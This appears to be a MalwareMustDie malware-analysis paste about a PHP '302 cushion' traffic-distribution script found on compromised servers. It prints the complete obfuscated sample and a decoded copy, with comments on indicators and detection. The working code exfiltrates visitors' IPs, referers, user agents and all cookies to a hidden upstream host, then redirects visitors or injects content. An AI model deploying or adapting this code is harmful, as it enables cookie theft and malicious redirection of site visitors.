
Evil 302 Cushion TDS Pointing to fbt.yahoo.com/counter.php

MalwareMustDie Apr 24th, 2014 494 Never
  1. //#MalwareMUSTDie!! Beware of TDS Redirection with 302 Cushion!!
  2. // Hard-coded within the script: http://fbt.yahoo.com/counter.php
  3. // PHP Injected/obfuscated Code Attack
  4. // Related Case: (previously) Rogue 302-Redirector - A (new?) "Cushion Attack", an Attempt to Evade IDS/IPS Signature
  5. //               http://blog.malwaremustdie.org/2013/09/302-redirector-new-cushion-attempt-to.html
  6. // Spotted in the wild (ITW) on several local VPS
  7. // NOTED: The "utilization" of hostname fbt.YAHOO.COM <=== point
  8. // Credit: S. M. & unixfreaxjp / #MMD Japan
  9.  
  10. // Original script:
  11.  
  12. <?$tds="http://fbt.yahoo.com/counter.php";
  13. $password="fff124106f3430";
  14. $g="http://mypillshop.ru";
  15. $esdid="counter3";
  16. $key="zzzzgb54y45yb45tktbwtberheh6e4wh";
      // Analyst note: the five assignments above are the per-install config
      // (upstream URL, encoded upstream address, fallback redirect target,
      // campaign tag, operator key). The '<?//BREACK//?>' marker on the next
      // line is the splice point used by the script's self-rewrite endpoint and
      // a stable grep string for this family. From the marker onward the sample
      // is one statement stream hard-wrapped at a fixed width, so the lines
      // below break mid-token; the "Decoded into:" listing further down is the
      // readable walk-through. One byte-level detail matters here: the quoted
      // literal inside strlen('...') at the fsockopen( call spans a line break,
      // and its byte length feeds the arithmetic that rebuilds the upstream
      // address, so re-derive that address from the as-found file bytes, not
      // from a reflowed copy.
  17. ?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');
  18. $p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3
  19. ]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0'
  20. ,$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo
  21. '{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET
  22. ['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$
  23. scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<si
  24. zeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c,
  25. $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$
  26. v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=s
  27. ubstr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen('
  28.   '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'
  29. .$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTT
  30. P_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HT
  31. TP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT'])
  32. ;foreach($_COOKIE as $key=>$n) {$t=$t."&".$key."=".$n;}$t=urlencode($t);i
  33. f(empty($t)){$t=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom
  34. =".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$t."&esdid
  35. =".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite
  36. ($d, $y);    while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty(
  37. $q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);}    
      // Reply dispatch follows: an upstream body starting 'http://' becomes a
      // 302 Location, 'cook://' becomes one setcookie() per a=b pair, and
      // 'echo://' is printed into the page unescaped. When the socket above
      // failed, $f already holds the fallback URL $g, so the redirect still
      // fires.
  38.    $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found')
  39. ;header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("
  40. &", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}I
  41. f($w[0]=='echo'){echo $x;}?>
  42.  
  43. // Decoded into:
  44.  
  45. <?$tds="http://fbt.yahoo.com/counter.php";
      // Analyst notes (MalwareMustDie sample). This is a "302 cushion" traffic
      // distribution system (TDS) stub. Flow: (1) rebuild a hidden upstream
      // address from $password; (2) serve two key-gated operator endpoints
      // (mode=config, mode=setconfig); (3) report the visitor to the upstream
      // over a raw socket; (4) act on the one-line reply: redirect, set
      // cookies, or echo content. Every literal in this file is a usable
      // indicator when sweeping a suspected host.
      // $tds is used verbatim on the HTTP request line and its hostname becomes
      // the Host header, so a proxy or IDS log shows a yahoo.com fetch even
      // though the TCP connection goes to the computed address (see fsockopen
      // below) -- that is the "utilization" of the Yahoo hostname noted above.
  46. $password="fff124106f3430";
      // Not a credential: raw material for the upstream address. Each 'f' is
      // rewritten to '0' further down.
  47. $g="http://mypillshop.ru";
      // Fallback redirect target, used only when the upstream socket fails.
  48. $esdid="counter3";
      // Campaign / installation tag, sent as esdid= in the report.
  49. $key="zzzzgb54y45yb45tktbwtberheh6e4wh";
      // Operator secret gating the two endpoints below. Compared with the loose
      // == operator, and later clobbered by the cookie loop's foreach variable
      // (harmless here, the gate has already been evaluated by then).
  50. ?><?//BREACK//?><?php error_reporting(0);
      // '<?//BREACK//?>' is the splice marker the setconfig branch looks for
      // when it rewrites its own file; it is also a high-value grep string.
      // error_reporting(0) hides the notices the sloppy code below would emit
      // (undefined $_GET/$_SERVER indexes, the bare HTTP_REFERER constant).
      //
      // --- Stage 1: rebuild the upstream endpoint from $password ---
      // With this $password, $password.'2' = "fff124106f34302" and the split
      // (chunk length given as the string '3', coerced to 3) yields
      // ["fff","124","106","f34","302"].
  51. $a = str_split($password . '2', '3');
  52. $p = '0';
      // "f34" -> "034" -> 34 + 3 = 37 (numeric-string coercion); incremented
      // to 38 below. It supplies the octet that is still missing from $p.
  53. $a[3] = str_replace('f', '0', $a[3]) + 3;
  54. $p.= $a[4];
  55. $p.= '.0';
      // The blank is a placeholder filled in at the fsockopen() call.
  56. $p.= ' ';
  57. $a[3]++;
  58. $p.= '.0' . $a[2] . '.0';
      // $p is now "0302.0 .0106.0". This replace is a no-op for this password
      // (no 'f' survives in $p) but matters for other installs' values.
  59. $p = str_replace('f', '0', $p);
      // $t = "124;" -- the ';' is stripped again before use; "124" is the last
      // octet fragment and, later, the prefix of the cookie report field.
  60. $t = str_replace('f', '0', $a[1]);
  61. $t = $t . ';';
      // --- Stage 2a: operator liveness check ---
      // ?mode=config&key=<secret> echoes the key wrapped in a marker. Any
      // request carrying mode=config to an unexpected .php file is worth an
      // alert. Because this echo precedes the header() calls at the bottom,
      // those calls would silently fail on such a request (headers already
      // sent, notices suppressed).
  62. if ($_GET['mode'] == 'config' and $_GET['key'] == $key) {
  63.     echo '{pkey" value="' . $key . '"}';
  64. }
      // --- Stage 2b: self-rewrite ---
      // ?mode=setconfig&key=<secret> makes the script overwrite its own file:
      // $scr ends up as the last path segment of SCRIPT_NAME (the basename),
      // opened relative to the process's working directory. Only line 0 is
      // edited: whatever precedes the '<?//BREACK//?>' marker on that line is
      // replaced with '<? ?>', i.e. the hard-coded config block of the
      // single-line original is wiped. In this multi-line decoded layout line
      // 0 is just the $tds assignment and holds no marker, so $b[1] is unset.
      // $getlpa / $jng are dead code. Defender signal: mtime change on a
      // web-exposed .php plus the byte sequence '<? ?><?//BREACK//?>'.
  65. if ($_GET["mode"] == "setconfig" AND $key == $_GET['key']) {
  66.     $sn = explode("/", $_SERVER['SCRIPT_NAME']);
  67.     foreach ($sn as $snn) {
  68.         $scr = $snn;
  69.     }
  70.     $getlpa = file($scr);
  71.     $jng = $getlpa[0];
  72.     $v = file($scr);
  73.     for ($i = 0;$i < sizeof($v);$i++) if ($i == 0) {
  74.         $ka = '<?//BRE';
  75.         $c = $ka . 'ACK//?>';
  76.         $b = explode($c, $v[$i]);
  77.         $v[$i] = '<? ?>' . $c . $b[1];
  78.     }
  79.     $d = fopen($scr, "w");
  80.     fputs($d, implode("", $v));
  81.     fclose($d);
  82. }
      // --- Stage 3: open the socket to the real upstream ---
      // $u keeps "fbt.yahoo.com" for the Host header; $s is then swapped for
      // the rebuilt address because $p is non-empty.
  83. $s = explode("/", $tds);
  84. $s = $s[2];
  85. $u = $s;
  86. if ($p) {
  87.     $s = $p;
  88. }
  89. $t = substr($t, 0, strlen($t) - 1);
      // The blank in $p becomes $a[3] - strlen('    ') = 38 - 4 = 34 in this
      // decoded listing, giving "0302.034.0106.0" . "124" =
      // "0302.034.0106.0124": a dotted quad with leading-zero octets, which
      // inet_aton-style parsers read as octal -- so a grep for the decimal IP
      // will miss it. The as-found sample above writes that strlen() literal
      // across a line break, so its length (and therefore this octet) depends
      // on the file's exact line-ending bytes; derive the address from the
      // original bytes rather than from this reflowed copy. Port 80, 2 s
      // timeout; $i/$o receive errno/errstr. On failure $f = $g, so the
      // visitor is still sent to the fallback domain.
  90. $d = fsockopen(str_replace(' ', $a[3] - strlen('    '), $s) . $t, 80, $i, $o, 2);
  91. if (!$d) {
  92.     $f = $g;
  93. } else {
          // Visitor fingerprint sent upstream: page URL, Referer, client IP,
          // whether X-Forwarded-For is present (proxy hint), User-Agent, every
          // cookie name=value appended after the "124" prefix, and the campaign
          // tag. The request line carries the absolute $tds URL and the Host
          // header says fbt.yahoo.com while the TCP peer is the computed
          // address. HTTP/1.0 with Connection: Close. The CRLFs of the original
          // appear as literal line breaks inside the string in this listing.
  94.     $h = urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
  95.     $m = urlencode($_SERVER[HTTP_REFERER]);
  96.     $p = urlencode($_SERVER["REMOTE_ADDR"]);
  97.     $e = 'no';
  98.     if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {
  99.         $e = 'yes';
  100.     }
  101.     $r = urlencode($_SERVER['HTTP_USER_AGENT']);
          // Reuses $key as the loop variable, overwriting the operator secret.
  102.     foreach ($_COOKIE as $key => $n) {
  103.         $t = $t . "&" . $key . "=" . $n;
  104.     }
  105.     $t = urlencode($t);
          // Unreachable for this $password: $t already starts with "124".
  106.     if (empty($t)) {
  107.         $t = urlencode($_SERVER['QUERY_STRING']);
  108.     }
  109.     $y = "GET " . $tds . "?dom=" . $h . "&ref=" . $m . "&ip=" . $p . "&prox=" . $e . "&agent=" . $r . "&cookie=" . $t . "&esdid=" . $esdid . " HTTP/1.0
  110. Host: " . $u . "
  111. Connection: Close
  112.  
  113. ";
  114.     fwrite($d, $y);
          // Read the reply in 128-byte chunks: skip headers until the first
          // blank line, then collect the body. The blank line itself is
          // collected in the same iteration, hence the substr($f, 2) after
          // the loop.
  115.     while (!feof($d)) {
  116.         $j = fgets($d, 128);
  117.         if ($j == "
  118. " && empty($q)) {
  119.             $q = 'do';
  120.         }
  121.         if ($q == 'do') {
  122.             $f.= $j;
  123.         }
  124.     }
  125.     fclose($d);
  126.     $f = substr($f, 2);
  127. }
      // --- Stage 4: act on the reply's scheme word ---
      // 'http'  -> 302 Found with Location set to whatever the upstream (or
      //            the fallback $g) supplied; only an exact 'http', so an
      //            'https://' reply would fall through.
      // 'cook'  -> substr($f, 7) strips "cook://"; each a=b pair becomes a
      //            setcookie() with unvalidated, unencoded values.
      // 'echo'  -> the raw upstream bytes are written into the page unescaped
      //            (remote content injection).
      // Defender signals: off-site 302 Location from a page that should be
      // static, setcookie() from unexpected files, and the fallback domain in
      // responses when the upstream is unreachable.
  128. $w = explode("://", $f);
  129. If ($w[0] == 'http') {
  130.     header('HTTP/1.1 302 Found');
  131.     header('Location: ' . $f);
  132. }
  133. $x = substr($f, 7);
  134. if ($w[0] == 'cook') {
  135.     $k = explode("&", $x);
  136.     foreach ($k as $l) {
  137.         $z = explode("=", $l);
  138.         setcookie($z[0], $z[1]);
  139.     }
  140. }
  141. If ($w[0] == 'echo') {
  142.     echo $x;
  143. } ?>
  144.  
  145. ---
  146. #MalwareMustDie!!